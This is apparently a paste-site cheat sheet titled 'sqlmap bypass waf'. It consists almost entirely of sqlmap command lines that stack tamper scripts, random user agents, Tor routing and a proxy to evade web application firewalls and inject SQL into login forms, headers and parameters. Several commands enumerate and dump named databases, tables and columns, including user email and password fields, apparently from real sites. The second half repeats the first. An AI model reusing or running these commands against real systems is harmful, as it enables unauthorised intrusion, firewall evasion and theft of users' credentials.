paperline27

sqlmap bypass waf

Sep 10th, 2023 (edited)
  1.  
  2. #Bypass WAF SQLMAP
  3.  
  4. Example:
  5. $ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
  6. $ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --dbs
  7. $ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
  8.  
  9. $ sqlmap -u "http://sitetarget.com/login" --data="userid=admin&passwd=admin" --method POST --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
  10. $ sqlmap -u "sitetarget.com/admin/login_action" method="POST" --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --dbs --technique=T
  11. $ sqlmap -u "sitetarget.com/admin/login_action" method="POST" --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --headers="input field header" --dbs --technique=T
  12.  
  13. Examples for newer sqlmap versions (without the --identify-waf option):
  14.  
  15. $ sqlmap -u "Target.com" --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
  16. $ sqlmap -u "Target.com" --random-agent -v 3 --dbs
  17. $ sqlmap -u "Target.com" --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
  18. $ sqlmap -u "http://sitetarget.com/login" --data="userid=admin&passwd=admin" --method POST --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs
  19. $ sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbs
  20.  
  21. Example: dump a DB using a saved HTTP POST request file (poc.txt):
  22. $ sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbms=MySQL -D database_target --tables
  23.  
  24. Example: WAF, with the injection point in a request header (X-Forwarded-For):
  25. $ sqlmap -u https://target.com/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --drop-set-cookie --dbms=mysql --dbs
  26. $ sqlmap -u https://target.com/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --dbs
  27.  
  28. Example: Cloudflare WAF, routed through a Tor proxy on its default port:
  29. $ sqlmap -u "https://target.com" --data="id=63665%20RLIKE%20-bla-blablabla" --time-sec=20 --random-agent --level=5 --risk=3 --tamper="space2comment,between,randomcase,charencode" --technique=BEUST --privileges --no-cast --tor --tor-port=9050 --tor-type=socks5 --check-tor --banner --union-char=1 --dbms=MySQL --dbs
  30.  
  31.  
  32. --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
  33. --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
  34. --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
  35. -v3 --technique=T --no-cast --fresh-queries --banner
  36. sqlmap -u http://www.********?id=1 --level 2 --risk 3 --batch --dbs
  37.  
  38.  
  39. -f -b --current-user --current-db --is-dba --users --dbs
  40.  
  41. --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
  42.  
  43. --risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs
  44.  
  45. --random-agent --dbms=MYSQL --dbs --technique=B"
  46.  
  47. --identify-waf --random-agent -v 3 --dbs
  48.  
  49. 1 : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
  50. 2 : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3
  51.  
  52. --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
  53.  
  54. --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent
  55.  
  56. sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
  57.  
  58. --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
  59. -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu
  60.  
  61. C:\Python27\python.exe sqlmap.py --wizard
  62.  
  63. --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  64.  
  65.  
  66. sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql
  67.  
  68. sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  69.  
  70.  
  71. sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  72.  
  73.  
  74. --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"
  75.  
  76. sqlmap -u ‘http://www.site.com:80/search.cmd?form_state=1’ –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
  77.  
  78.  
  79. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent
  80.  
  81. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables
  82.  
  83. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns
  84.  
  85. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump
  86.  
  87. tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql
  88.  
  89.  
  90. --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
  91.  
  92. --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
  93.  
  94. --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
  95.  
  96. -v3 --technique=T --no-cast --fresh-queries --banner
  97.  
  98. sqlmap -u http://www.********?id=1 --level 2 --risk 3 --batch --dbs
  99.  
  100.  
  101. -f -b --current-user --current-db --is-dba --users --dbs
  102.  
  103. --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
  104.  
  105. --risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs
  106.  
  107. --random-agent --dbms=MYSQL --dbs --technique=B"
  108.  
  109. --identify-waf --random-agent -v 3 --dbs
  110.  
  111. 1 : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
  112. 2 : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3
  113.  
  114. --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump
  115.  
  116. --tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent
  117.  
  118. sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
  119.  
  120. --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
  121. -v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu
  122.  
  123. - sqlmap.py --wizard
  124.  
  125. --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  126.  
  127. - sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql
  128.  
  129. - sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  130.  
  131. - sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql
  132.  
  133. --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords"
  134.  
  135. - sqlmap -u ‘http://www.site.com:80/search.cmd?form_state=1’ –level=5 –risk=3 -p ‘item1’ –tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
  136.  
  137. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent
  138.  
  139. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables
  140.  
  141. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns
  142.  
  143. --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump
  144.  
  145. tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql
  146.  